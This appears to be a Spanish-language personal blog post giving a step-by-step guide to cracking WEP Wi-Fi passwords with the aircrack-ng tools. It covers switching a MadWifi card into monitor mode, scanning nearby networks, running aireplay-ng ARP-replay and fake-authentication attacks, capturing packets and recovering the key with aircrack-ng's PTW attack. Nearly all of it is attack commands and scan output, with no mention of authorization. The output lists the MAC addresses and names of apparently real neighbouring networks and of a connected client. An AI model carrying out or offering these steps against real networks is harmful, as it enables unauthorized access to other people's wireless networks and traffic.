solo abarca el obtener contraseñas tipo wep, breve explicacion, la contraseña puede estar en hexa y en ascii, elementos para trabajar:
1.- tarjeta wireless en modo monitor, aircrack-ng, airoplay-ng, airodump-ng,
todo esto instalable
sudo apt-get install xxxxxxx
ahora lo otro
como es mi pc explico esta con los drivers mad wifi y funcionan de la con los siguiente comandos:
primero hay que eliminar la interfaz en modo managed:
wlanconfig ath0 destroy
con eso cayo el internet, ahora crearla con modo monitor.
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
para volver a crear en modo monitor reemplazar "monitor" por "managed"
listo.
hecho eso los programas que instados se usan a
Primero:
airodump-ng -c 6 ath0
el “-c” es channel “6” es el canal y ath0 es el dispositivo wireless
de la info que te arroja es pantalla son dos los datos importantes que seran reutilizados mas adelantes,
CH 6 ][ Elapsed: 20 s ][ 2008-10-08 14:58
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:02:CF:95:55:DC 28 100 223 4964 222 6 54. WEP WEP DELUX
00:1B:11:A6:41:22 20 80 202 0 0 6 54. WEP WEP D33
00:0F:66:9E:82:70 1 0 2 0 0 6 48 OPN linksys
00:1C:DF:15:3C:6A 1 80 167 0 0 6 54 WPA TKIP PSK Cerdo Ara�a
00:14:D1:3E:B4:4A 0 0 36 1 0 6 54. WEP WEP Cristobal M
BSSID STATION PWR Rate Lost Packets Probes
00:02:CF:95:55:DC 00:1F:E1:36:4B:A0 67 54-48 24 8838 DELUX
00:02:CF:95:55:DC 00:14:78:8F:BF:F6 44 0-54 0 2
atencion a las negritas,
el BSSID es la mac del punto de acceso/router y STATION es la mac de un cliente conectado al punto de acceso. Estos datos loa guardamos en archivo de txt.
Ahora viene dos pasos que se ejecutan de manera simultanea, se abre una nueva terminal y la primera donde estabamos trabajando le damos clear y ponemos:
aireplay-ng --arpreplay -b [BSSID of the network] -h [Connected clients MAC address] [Interface]
rellenamos con los datos que guardamos, luego en la segunda terminal colocamos
aireplay-ng -1 0 -a [BSSID of the network] -h [Connected clients MAC address] -e [ESSID or Network Name] [Interface]
rellenamos nuevamente los campos con los datos que ya teniamos. Y hechamos a andar ambos a la vez
insistimos ejecutando varias veces el segundo.
Ya hecho esto hechamos a andar el airdump con:
airodump-ng -c [Channel] --bssid [BSSID of the network] -w [Capture file name] [interface]
reemplazando datos donde correspoponde esperar que se capturen 10.000 paketes.
Y para la guinda de la torta aircrack:
aircrack-ng -z {This starts the PTW attack which is much faster} [Capture file name]
esperas y tienes la clave.
No hay comentarios:
Publicar un comentario